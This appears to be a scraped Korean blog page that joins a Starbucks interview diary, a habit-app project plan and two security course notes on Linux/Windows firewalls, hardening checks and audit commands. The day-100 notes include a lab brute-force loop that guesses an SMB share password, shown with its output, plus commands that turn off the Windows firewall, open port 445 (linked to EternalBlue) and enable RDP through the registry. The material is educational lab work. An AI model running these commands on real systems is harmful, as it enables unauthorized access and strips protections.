728x90

인트로

지난주 수요일에 스타벅스 면접을 봤는데 오늘 드디어 '합격' 문자를 받았다.
면접 때 점장님께서 결과가 빠르면 이번 주 월화수, 늦으면 다음 주 월화수 중에 나온다고 하셨는데 다행히 빠르게 소식을 받았다.

이제 다음 주 월요일과 화요일에 교육을 들으러 간다.
교육 이후의 일정은 내일 점장님께서 전달해주신다고 해서 기다리는 중이다.

벌써부터 설레고 교육도 진짜 열심히 듣고 즐겁게 일하고 싶다.


면접 후기

스타벅스 지원할 때는 집 근처 지점을 1/2지망으로 썼는데 연락이 온 곳은 집에서 약 50분 거리의 지점이었다.
그래도 지하철 한 번 혹은 버스 한 번만 갈아타면 되는 거리라 '오며가며 레시피 공부도 하고 적응되면 사업 준비도 병행할 수 있겠다' 싶어 바로 해보기로 했다.

면접 날은 어쩌다 보니 한 시간이나 일찍 도착해서 근처 서점에 들렀다.
책 구경을 하면서 ‘역시 나는 집에만 있는 것보다 밖에 나와야 자극도 받고 영감도 받는 사람이구나’ 싶었다.

면접 시작 10분 전에 매장에 들어가 '오늘 면접 보기로 한 ○○○입니다' 하고 인사한 뒤 잠시 대기하다가 점장님과 1:1 면접을 진행했다.

질문은 주로 이런 내용이었다.

  • 왜 스타벅스에 지원했는가
  • 비슷한 경력이 있는가
  • 우리 매장은 정말 힘든데 괜찮겠는가 (여러 번 강조하심)
  • 스케줄 근무인데 가능하겠는가
  • 근무 후 연락 없이 잠수 타는 사람이 많은데, 혹시 그만둘 때는 꼭 연락을 해줄 수 있겠는가

나도 이전에 팀을 이끌 때 신입이 갑자기 연락 끊는 경우를 여러 번 겪어봤기에 "만약 너무 힘들면 꼭 말씀을 드리겠다고, 하지만 저는 힘들더라도 열심히 할 각오로 지원을 한 것"이라고 대답했다.

그리고 내가 스타벅스에 지원한 이유는 단순히 카페 일을 해보고 싶어서가 아니라,
‘서비스·마케팅 관점에서 고객 경험을 직접 배우고 싶어서’ 였다.
개발자로서 서비스를 만들어봤지만 '만드는 것과 파는 것은 전혀 다르다'는 걸 절실히 느꼈다.
사람들이 뭘 원하는지를 진짜 알기 위해서는 현장에서 부딪히는 경험이 필요하다고 생각했다.

면접이 끝날 무렵에는 점장님께서 살짝 합격의 뉘앙스를 주셔서 '조만간 출근을 하겠다'는 예감이 들었다.


합격 후 준비 과정

합격 문자는 점심쯤에, 교육 안내 메일은 오후 늦게 도착했다.
교육안내 메일보다 점장님께 먼저 전화가 와서 "축하드린다, 같이 일하게 되어 기쁘다"는 말을 들었는데
이런 따뜻한 전화를 처음 받아봐서 순간 뭐라 답해야 할지 몰라 "아 감사합니다" 한마디만 하고 끝냈다..ㅋㅋㅋ

메일에는 준비해야 할 서류로 보건증, 등본, 최종학력증명서, 통장사본이 적혀 있었다.
다행히 보건증은 미리 신청해놨고 최종학력증명서는 사이버대 재학생이라 재학증명서로 출력했다.

또 교육 시에는
"단정하거나 비즈니스 캐주얼 복장으로 와주시고 모자나 슬리퍼는 착용을 지양해주세요"라고 적혀 있었는데
'슬리퍼 신고 오는 사람도 있나'싶었다.
세상엔 정말 별사람 다 있구나 싶었다.

다른 블로그 후기들을 보니 교육일에도 시급이 지급되고 첫날부터 사번이 발급돼서 직원할인도 바로 적용된다고 한다.
근무하면서 하루 2잔씩 마실 수 있다보니 따로 또 사먹을 일이 얼마나 많겠나 싶긴한데 그래도 일단 신나긴하다ㅋㅋㅋ


앞으로의 일정

내일 점장님께서 교육 주간의 근무 스케줄을 알려주신다고 한다.
아마 교육이 끝나자마자 바로 첫 출근을 하게 될 것 같다.

그동안 다른 블로그들에서만 보던 내품기니 부재료, 레시피들과 씨름하는 날이 곧 올것이다.
'스타벅스는 텃세가 심하다던데 내가 가는 매장은 어떨까'하는 두려움 반, 설렘 반의 마음도 있다.

생각해보니 이번 주는 마지막 백수 주간이다.
시간이 널널할 때 최대한 개발할 거 개발하고, 과제도 끝내고, 스타벅스 앱으로 미리 메뉴를 보면서 눈에 익혀두려 한다.

언제나 처음은 설렌다. 하하


마무리

개발자로서의 12년을 뒤로하며 이제는 새로운 삶의 챕터를 열고 있다.

개발자로서의 정체성을 버릴 생각은 없지만
인생은 길고 한 가지 직업만으로는 표현할 수 없는 게 많다고 생각한다.
그래서 이번엔 '바리스타로서의 나'로 살아보려 한다.

두 번째 인생도 힘들어도 버티면서
때로는 즐겁고 때로는 보람차게 보내고 싶다.

728x90
728x90

서비스명

꾸하사(꾸준히 하고싶은 사람들)

한 줄 소개

돈으로 동기부여하는 습관 형성 챌린지 서비스

핵심 메커니즘

  • 매달 초 참가비 납부(티어별 차등)
  • 매일 일기(100자 이상) + 투두 인증사진 업로드
  • 인증 성공한 날만큼 환급금 지급
  • 30일 완주 시 전액 환급

타겟

  • 작심삼일로 포기하는 사람들(사실 나..)
  • 금전적 동기부여가 필요한 사람들
  • 습관을 만들고 싶은데 의지가 부족한 사람들

주요기능

사용자 기능

  • 챌린지 신청
  • 일기 작성
  • 투두 등록 + 투두 인증
  • 내 기록 조회
  • 환급 내역 확인
  • 커뮤니티 게시판

관리자 기능

  • 챌린지 생성/관리
  • 참가자 관리
  • 인증 검수
  • 환급 처리
  • 게시판 관리
  • 통계/레포트

기술 스택

프론트엔드

  • Vue.js

백엔드

  • Spring Boot
  • PostgreSQL
  • Ubuntu22

(혼자지만)협업 도구

  • Github
  • Notion
  • ChatGPT
  • Claude

현재 진행 상황

완료

  • 서비스 기획 및 기능 정의
  • 화면 설계
  • 사용자/관리자 페이지 퍼블리싱 파일 제작
    • 관리자 페이지 13개 완성
    • 사용자 페이지 15개 완성

진행중

  • DB 설계 및 구축

다음 할 일

  • API 설계
  • API 개발 서버 구축

개발 일정

  • 9/30 ~10/2 : 서비스 기획 및 기능 정의, 화면 설계, 페이지 퍼블리싱
  • 10/3 ~ 10/8 : 추석 연휴
  • 10/9 ~ 10/10 : DB설계, 백엔드 개발 시작
  • 10/13 ~ 10/17 : 사용자 페이지 개발, API 연동
  • 10/20 ~ 10/24 : 관리자 페이지 개발, API 연동
  • 10/27 ~ 10/29 : 테스트 및 배포 준비
  • 10/30 : 베타 오픈 목표

회고

Claude와 사용자/관리자 페이지 디자인을 상의하면서 나는 정말 디자인 감각이 없다는 걸 깨달았다.
당장 지금 Claude가 만들어준 디자인도 나는 괜찮아 보이는데 다른 사람이 보면 이상해 보일 수도 있지 않을까...? 🤔
뭐 어쨌든 일단은 내가 할 수 있는 일(기획과 개발)에 집중하기로 했다.

728x90
728x90

/ 리눅스
- 리눅스는 자신의 상태를 알려주는 다양한 기능이 존재한다.
- 자동 보고 기능
- abrt-cli list --since 1677720201
- rsyslogd  ---> /var/log
 > 윈도우(sysmon.exe)

 

/ 윈도우 방화벽
- 방화벽 : 시스템 방화벽 -> 고급 방화벽 -> iptables와 유사하다.(특정 프로그램 / 특정 포트를 대상으로 한다.)
- defender(커널단...) -> selinux와 유사하다. 
- 직접 설치 : 백신 / 키로그방지 / 브라우저 자체 방화벽
- 방화벽 모듈 --> WAF ---> CATLE / Web Knight / Snort

/ 리눅스 방화벽
- selinux(커널단 방화벽)
 > enforcing  : 활성화
 > permissive : 비활성화
 > disabled   : 꺼짐
 > 명령 : setenforce / getenforce / setbool
- iptables : port / service 단위 등록 / Network + rich rule(기본 룰 + 추가 옵션)
- RHEL --> firewalld
 ex) firewall-cmd --permanent --zone=public --add-rich-rule='rule family="ipv4" source address="14.36.28.128/25" port protocol="tcp" port="22" accept'
- Ubuntu ---> ufw
 ex) ufw allow from 10.0.2.15 to any port 9666
- 최신형 nftable(nework filter tables)
 > iptables, ip6tables, arptables 기능을 모두 포함하는 tool 입니다. 
- tcpwrapper ---> 서비스단에 전달되기 직전 방화벽

/ rich rule
- ACCEPT     tcp  --  14.36.28.128/25      anywhere             tcp dpt:9200
- iptables -L
- iptables -A INPUT -p tcp -s SRC.IP --sport SRC.PORT -d DEST.IP --dport DEST.PORT -j ACEEPT
- -A : append : 정책을 추가할꺼야~

-j  : 정책 ---> 1. DROP
                2. ACCEPT
                3. REJECT
                4. LOG
                5. RETURN
-A : 새로운 규칙을 추가한다. (--append)
-D : 규칙을 삭제한다. (--delete)
-C : 패킷을 테스트한다. (--check)
-I : 새로운 규칙을 삽입한다. (--insert)  
 * -A와 다른점은 -A는 아무런 규칙이 없는 상태에서 추가를 하는 것이고 -I 옵션은 규칙이 생성된 상태에서 삽입한다는 의미이다.
-R : 새로운 규칙으로 교체한다. (--replace)
-L : 새로운 규칙을 출력한다. (--list)
-F : 체인의 모든 규칙을 삭제한다. (--flush)
-Z : 모든 체인의 패킷과 바이트 카운터 값을 0으로 만든다. (--zero)
-N : 새로운 체인을 만든다. (--new)
-X : 체인을 삭제한다. (--delete-chain)
-P : 기본정책을 변경한다. (--policy)
-p : 패킷의 프로토콜의 포트번호 또는 이름을 명시한다. (--proto) (ex: tcp, udp, 21, 22)
-s : 패킷의 발신지를 명시한다. (--source)
-d : 패킷의 도착지를 명시한다. (--destination)
-i : 규칙을 적용할 인터페이스 이름을 명시한다. (--in-interface)
-j : 규칙에 맞는 패킷을 어떻게 처리할 것인가를 명시한다. (--jump)
-y : 접속 요청 패킷인 SYN패킷을 허용하지 않는다. (--syn)
-f : 두 번째 이후의 패킷에 대해서 규칙을 명시한다. (--fragment)
-m : 특정 모듈과의 매치 (--match)

 

/ 예제

iptables -A INPUT -p tcp -m tcp --dport 80 -j --syn DROP
iptables -A INPUT -p tcp -s 192.168.0.0/24 -d 192.168.0.10 --dport 80 -j DROP
ssh 서비스로 60초간 10번의 접속 시도가 발생하면 DROP
iptables -I INPUT -p tcp --dport 22 -m state NEW -m recent --update --seconds 60 --hitcount 10 -j DROP
firewall-cmd --list-all
firewall-cmd --permanent --add-port=443/tcp
firewall-cmd reload
ufw status
ufw allow tcp/80
nftables ---> iptables로 구성된 설정 ---> 변환 적용 가능 (iptables-translate)
최신 도커를 올리는 경우 실행할 때 추가 옵션이 필요한 경우 있음
   --iptables=false

 

/ 서버 입장에서 가장 성가신 부분
- DOS 공격 : icmp
- 기본적인 보안 세팅 : icmp_echo_ignore
- cd /proc/sys/net/ipv4
- cat icmp_echo_ignore_all
 > 0 : disable
 > 1 : enable
- 핑 응답을 하지 않도록 설정 : echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
 > Netdiscovery를 방지 할 수 있다.

/ 취약점 (분석) 명령어
- 현재 실행중인 프로세스 확인 : ps -ef
- 마지막 접속 정보 확인 : last
- 현재 접속중인 사용자 : w / who

/ Set UID : (권한제어)
- 접근제어
 > superuser만 사용할 수 있는 디렉터리 : /sbin
 > 일반계정도 사용할 수 있는 디렉터리   : /bin
- find / -user root -perm -4000 -print > 4000_perm.txt
 > 현재 상태 : 백도어가 없는 클린 상태 4000_perm.txt
- find / -user root -perm -4000 -print > 4000_perm_1.txt
- diff 4000_perm.txt 4000_perm_1.txt

root@Centos7:~/tmp# find / -user root -perm -4000 -print > 4000_perm.txt
find: ‘/proc/130270/task/130270/fd/5’: 그런 파일이나 디렉터리가 없습니다
find: ‘/proc/130270/task/130270/fdinfo/5’: 그런 파일이나 디렉터리가 없습니다
find: ‘/proc/130270/fd/6’: 그런 파일이나 디렉터리가 없습니다
find: ‘/proc/130270/fdinfo/6’: 그런 파일이나 디렉터리가 없습니다
root@Centos7:~/tmp# find / -user root -perm -4000 -print > 4000_perm_1.txt
find: ‘/proc/130389/task/130389/fd/5’: 그런 파일이나 디렉터리가 없습니다
find: ‘/proc/130389/task/130389/fdinfo/5’: 그런 파일이나 디렉터리가 없습니다
find: ‘/proc/130389/fd/6’: 그런 파일이나 디렉터리가 없습니다
find: ‘/proc/130389/fdinfo/6’: 그런 파일이나 디렉터리가 없습니다
root@Centos7:~/tmp# diff 4000_perm.txt 4000_perm_1.txt
root@Centos7:~/tmp#
sticky (4000)으로 설정된 추가파일이 없음

 

/ 백도어 설치 여부 점검
- /dev, /tmp 체크 : 기본적으로 디렉토리 퍼미션에 sticky가 붙어있다.

/ rootkit 탐색
- find /dev -type f -exec ls -l {} \;

/ 무결성 검사
- tripwire : 파일의 변동 사항 유무 체크
- wget https://src.fedoraproject.org/repo/pkgs/tripwire/tripwire-2.3.1-2.tar.gz/6a15fe110565cef9ed33c1c7e070355e/tripwire-2.3.1-2.tar.gz

/ 포트 스캔
- 열려있는 포트 및 응답 가능한 포트 점검 : 좀비PC 감염 여부
- 자신의 시스템에서 netstat -atp | grep LISTEN

/ 외부 호스트의 포트 확인
- telnet IP port

/ for문
- 윈도우 DOS

for %i in (1,1,65534) do telnet 192.168.0.30 %i

- 리눅스

for i in {55..59}
 > do
 > ping 192.168.0.%i -c 1
 > done

 

/ 시스템에서 열려있는 파일에 대한 정보를 출력
- lsof == list open files
- lsof | grep LISTEN

root@Centos7:~# lsof | grep LISTEN
httpd      1646                root    4u     IPv6              33965        0t0        TCP              *:http (LISTEN)
httpd      1646                root    6u     IPv6              33969        0t0        TCP              *:https (LISTEN)
dovecot    1674                root   25u     IPv4              32127        0t0        TCP              *:pop3 (LISTEN)
dovecot    1674                root   37u     IPv4              32150        0t0        TCP              *:imap (LISTEN)
master     1893                root   13u     IPv4              33403        0t0        TCP              *:smtp (LISTEN)
master     1893                root   92u     IPv4              33489        0t0        TCP              localhost:10025 (LISTEN)
/usr/bin/  2105                root    5u     IPv4              32568        0t0        TCP              localhost:783 (LISTEN)
/usr/sbin  2328              amavis    5u     IPv4              35298        0t0        TCP              localhost:10024 (LISTEN)
httpd      2329              apache    4u     IPv6              33965        0t0        TCP              *:http (LISTEN)
httpd      2329              apache    6u     IPv6              33969        0t0        TCP              *:https (LISTEN)
spamd      2341                root    5u     IPv4              32568        0t0        TCP              localhost:783 (LISTEN)
/usr/sbin  2343              amavis    5u     IPv4              35298        0t0        TCP              localhost:10024 (LISTEN)
프로세스명  PID             프로세스 소유자     프로토콜 버전                              TCP/UDP 여부                       현재 응답 가능 여부

 

/ pstree
- 최상위가 systemd이면 최소 centos7이다.

/ top
- top -d2

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

728x90

'보안 > KITRI 침해대응' 카테고리의 다른 글

99일차 - 보안가이드라인  (0) 2023.03.07
97일차 - 이더채널  (0) 2023.03.03
96일차 - 본딩  (0) 2023.03.02
95일차 - GRE  (0) 2023.02.28
94일차 - VPN  (0) 2023.02.27
728x90
ISO : 국제 표준 기구
    보안과 관련된 사항을 정리 ----> ISO 2700X 패밀리 : 최소한...
    --> 27001 정보보호관리체계  ===> ISMS
    처벌 규정이 존재하지 않는다.  ---> 다만 국제 정보처리 과정 : ISMS 인증을 받은 기관끼리만 정보 교류가 가능하다.
    개인정보보호관리체계 ---> PIMS.
    정부기관 정보보호관리체계 ---> G-ISMS

    KISA ---> ISMS + P-ISMS  ===> ISMS-P

    ISMS ---->   1. 물리적 보안 ---> 캡스 (접근제어 : 인간)
                 2. 기술적 보안 ----> 보안 담당자
                 3. 관리적 보안 ----> ISMS 의 집중사항  : 보안 책임자
        
        유럽 : GDPR --> 보안 가이드 + 처벌
        국제 : ISMS
        한국 : ISMS-P

기술적 보안  ---> 시스템 (주정통)   --- 1. Linux 계열
                                      2. 윈도우 계열
                                      #3. ARM <--- 산업용 제외
                                      3. 보안위협 / 취약점 점검 / 보안관리
                                      ===> 서버 / 네트워크 관제 <--- OP  : 운영관리 OK
                                                                        모니터링 : OUT
                                           보안 관제 ---> 분석 ---> 평가 / 취약점 점검  ---> CERT
                 네트워크 (주정통)  --- 1. 계층별 패킷 분석(L1 ~ L4)
                                      2. 네트워크 장비 (스위치 / 라우터)
                                      3. 네트워크 보안 장비 (IPS / IDS)
                        
                     ---> ESM --> SIEM
                
                 어플리케이션      ---  1. DB
                                       2. APP (어플리케이션) -- 1. 모바일
                                                               2. Web
                                       3. WAS
                 보안법규      --- 1. 개인정보
                                  2. 안전조치   ----------> CERT 
                                  3. 사고 사례

1. 시스템 -- 윈도우 / 리눅스
      윈도우 ---> POST 과정
                    1. 전원 켜기
                    2. post(POWER ON SELF TEST)
                       ㄴ ROM -> 저장된 BIOS 프로그램 작동 -> BIOS 설정된 하드웨어의 장비가 이상이 없는지 체크 -> (이상 발생 시 소리)
                       1. 메인보드 전원 확인
                       2. CPU 확인
                       3. 그래픽카드 확인
                       4. RAM 체크
                    ===============  기본 장비엔 이상이 없음. =====================
                    3. MBR(Master Boot Recoder) 읽기
                        BIOS에 설정된 부팅 순서에 따라 
                        MBR : Boot Loader ----> NTLDR : XP 이하
                                                BOOTMGR
                              저장소에 있는 부팅 이미지를 메모리에 상주 시킨다.
                              ---> 부팅과 관련된 설정 정보
                              ---> 멀티 부팅이 가능하다.
                        정보 : BIOS가 갖고 있는 정보 + 윈도우 (프로필)에 등록된 정보보   
                        winload.exe : *** Ntoskrnl.exe / hal.dll 실행
                        => 레지스트리에 등록되어 있는 시스템 설정정보를 읽어서 하드웨어 관련 드라이브 로딩 
                        => 로그온 화면 출력
                    4. 로그인 ----> 단독 그룹  ---> Local 프로필
                              ----> 도메인    ----> 도메인안에 있는 프로필

실습 
cmd <--- 도스 명령어
도스 명령어 
for %i in (1,1,5) do echo %i
for /L %i in (1,1,5) do echo %i
파이썬 코드
for i in range(1,6,1):
    print(i)


세상에서 제일 쉬운 브루트 포스 공격
대상 서버 : 192.168.0.160  <-- 공유폴더   :  smb 계정을 사용한다. 
                                           패스워드 : 4자리의 숫자를 사용한다. 1234
           공유폴더이름 : /share
공유폴더 접근을 위한 명령어
net use \\192.168.0.160\share /USER:smb 1234

C:\Users\kitri>net use \\192.168.0.160\share /USER:smb 1234
시스템 오류 86이(가) 생겼습니다.

지정된 네트워크 암호가 맞지 않습니다.

ID는 맞으나 비밀번호가 틀림.
for /L %i in (1230,1,1235) do net use \\192.168.0.160\share /USER:smb %i

C:\Users\kitri>net use \\192.168.0.160\share /USER:smb 1233
시스템 오류 86이(가) 생겼습니다.

지정된 네트워크 암호가 맞지 않습니다.


C:\Users\kitri>net use \\192.168.0.160\share /USER:smb 1234
명령을 잘 실행했습니다.


C:\Users\kitri>net use \\192.168.0.160\share /USER:smb 1235
시스템 오류 1219이(가) 생겼습니다.

동일한 사용자가 둘 이상의 사용자 이름으로 서버 또는 공유 리소스에 다중 연결할 수 없습니다. 서버나 공유  리소스에 대한 이전 연결을 모두 끊고 다시 시도하십시오.

C:\Users\kitri>net use \\192.168.0.160\share /USER:smb 1234
명령을 잘 실행했습니다.

패스워드 : 1234 임을 알 수 있다.

주정통의 설정값 -----> 로컬보안정책  : 수동으로 확인
자동화 ---> 보안템플릿 내보내기
로컬 보안 정책 > 동작 > 정책 내보내기

https://docs.microsoft.com/ko-kr/windows-server/administration/windows-commands/secedit-export
secedit-export

secedit /export /cfg
실행 명령
export 위치 : C:\Users\kitri\Desktop
export 파일명 : kong.inf
secedit /export /cfg C:\Users\kitri\Desktop\kong.inf

분기 ----> 1. kong.inf을 이용해 취약성 점검
          2. 취약성 점검을 통해 알아낸 취약성 보완

secedit /import /cfg C:\Users\kitri\Desktop\kong.inf

* SID : 보안 식별자 / UID
*S-1-5-32-544  ===> SID  : 계정 확인

===   위에선 보안 탬플릿을 통해 보안 정책을 확인 / 수정  ===

특정 계정에 대한 정보를 확인
net user smb

C:\Users\kitri>net user smb
사용자 이름                        smb
전체 이름                          smb
설명
사용자 설명
국가/지역 코드                     000 (시스템 기본값)
활성 계정                          예
계정 만료 날짜                     기한 없음

마지막으로 암호 설정한 날짜        2022-05-25 오전 11:05:55
암호 만료 날짜                     기한 없음
암호를 바꿀 수 있는 날짜           2022-05-25 오전 11:05:55
암호 필요                          예
사용자가 암호를 바꿀 수도 있음     아니요

허용된 워크스테이션                전체
로그온 스크립트
사용자 프로필
홈 디렉터리
최근 로그온                        아님

허용된 로그온 시간                 전체

로컬 그룹 구성원                   *Users
글로벌 그룹 구성원                 *없음
명령을 잘 실행했습니다.

inp = input("계정명:")
print("net user " + inp + " >> " + inp + ".txt")

filename = inp + ".txt"
f = open(filename, "a")
data = f.readlines()

계정 생성
net user kkk /add

C:\WINDOWS\system32>net user kkk /add
명령을 잘 실행했습니다.


C:\WINDOWS\system32>net user kkk
사용자 이름                        kkk
전체 이름
설명
사용자 설명
국가/지역 코드                     000 (시스템 기본값)
활성 계정                          예
계정 만료 날짜                     기한 없음

마지막으로 암호 설정한 날짜        2023-03-07 오전 9:48:41
암호 만료 날짜                     2023-04-18 오전 9:48:41
암호를 바꿀 수 있는 날짜           2023-03-07 오전 9:48:41
암호 필요                          예
사용자가 암호를 바꿀 수도 있음     예

허용된 워크스테이션                전체
로그온 스크립트
사용자 프로필
홈 디렉터리
최근 로그온                        아님

허용된 로그온 시간                 전체

로컬 그룹 구성원                   *Users
글로벌 그룹 구성원                 *없음
명령을 잘 실행했습니다.

계정 삭제
net user kkk /delete
C:\WINDOWS\system32>net user kkk /delete
명령을 잘 실행했습니다.

계정의 권한 확인
C:\WINDOWS\system32>net accounts ?
이 명령에 대한 구문:

NET ACCOUNTS
[/FORCELOGOFF:{minutes | NO}] [/MINPWLEN:length]
              [/MAXPWAGE:{days | UNLIMITED}] [/MINPWAGE:days]
              [/UNIQUEPW:number] [/DOMAIN]

C:\WINDOWS\system32>net accounts
만료 시간이 지난 얼마 후에 강제 로그오프하시겠습니까?:     아님
최소 암호 사용 기간 (일):                                  0
최대 암호 사용 기간 (일):                                  42
최소 암호 길이:                                            0
암호 기록 개수:                                            없음
잠금 임계값:                                               아님
잠금 기간 (분):                                            30
잠금 관찰 창 (분):                                         30
컴퓨터 역할:                                               WORKSTATION
명령을 잘 실행했습니다.


 

/ spawn
- 별도의 프로세스로 움직이는 애들

/ runas
- spawn ---> 하위 프로세스를 생성 ---> fork
- 파이썬 -> 브라우저 실행
- runas /user:kitri notepad.exe
- runas /user:kitri "notepad.exe \"aaa.txt\""
- 다른 계정을 이용해서 커맨드 실행이 가능하다

/ 실습
- 현재 자신이 접속한 계정 : kitri
 > cmd(관리자 권한 실행)
- 현재 접속한 자신의 계정 정보 확인
 > query session
- runas /user:administrator "notepad.exe \"C:\Users\kitri\Desktop\시스템.txt\""

/ 방화벽 해제
- netsh advfirewall set allprofiles state off

/ 방화벽 제어
- 특정 포트를 열어준다.
- 445번 포트
- 이터널 블루 취약점
- smb취약점(MS17-010)
- netsh advfirewall firewall add rule name="tcp-445" dir=in action=allow protocol=tcp localport=445

/ 원격데스크탑 허용
- 레지스트리 편집 (regedit)
- 컴퓨터\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections 

- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

/ 다른 컴퓨터에 접속하는 방법
- net use \\192.168.0.160 /u:kitri

/ 특정 사용자 로그오프
- 다른 컴퓨터 사용자 확인 : query session /server:localhost
- 다른 컴퓨터 사용자 확인 : query session /server:192.168.0.160
- 로그오프 : logoff /server:192.168.0.160 세션ID
 > logoff /server:192.168.0.160 2

/ 주요정보통신기반시설
- 기술적 취약점 분석/평가 방법 상세가이드를 참고하여 체크한다.
- 파이썬을 사용하여 자동으로 검사하도록 만들어보자.

 

 

 

 

 

 

 

 

 

 

 

 

728x90

'보안 > KITRI 침해대응' 카테고리의 다른 글

100일차 - 보안가이드라인  (0) 2023.03.08
97일차 - 이더채널  (0) 2023.03.03
96일차 - 본딩  (0) 2023.03.02
95일차 - GRE  (0) 2023.02.28
94일차 - VPN  (0) 2023.02.27

+ Recent posts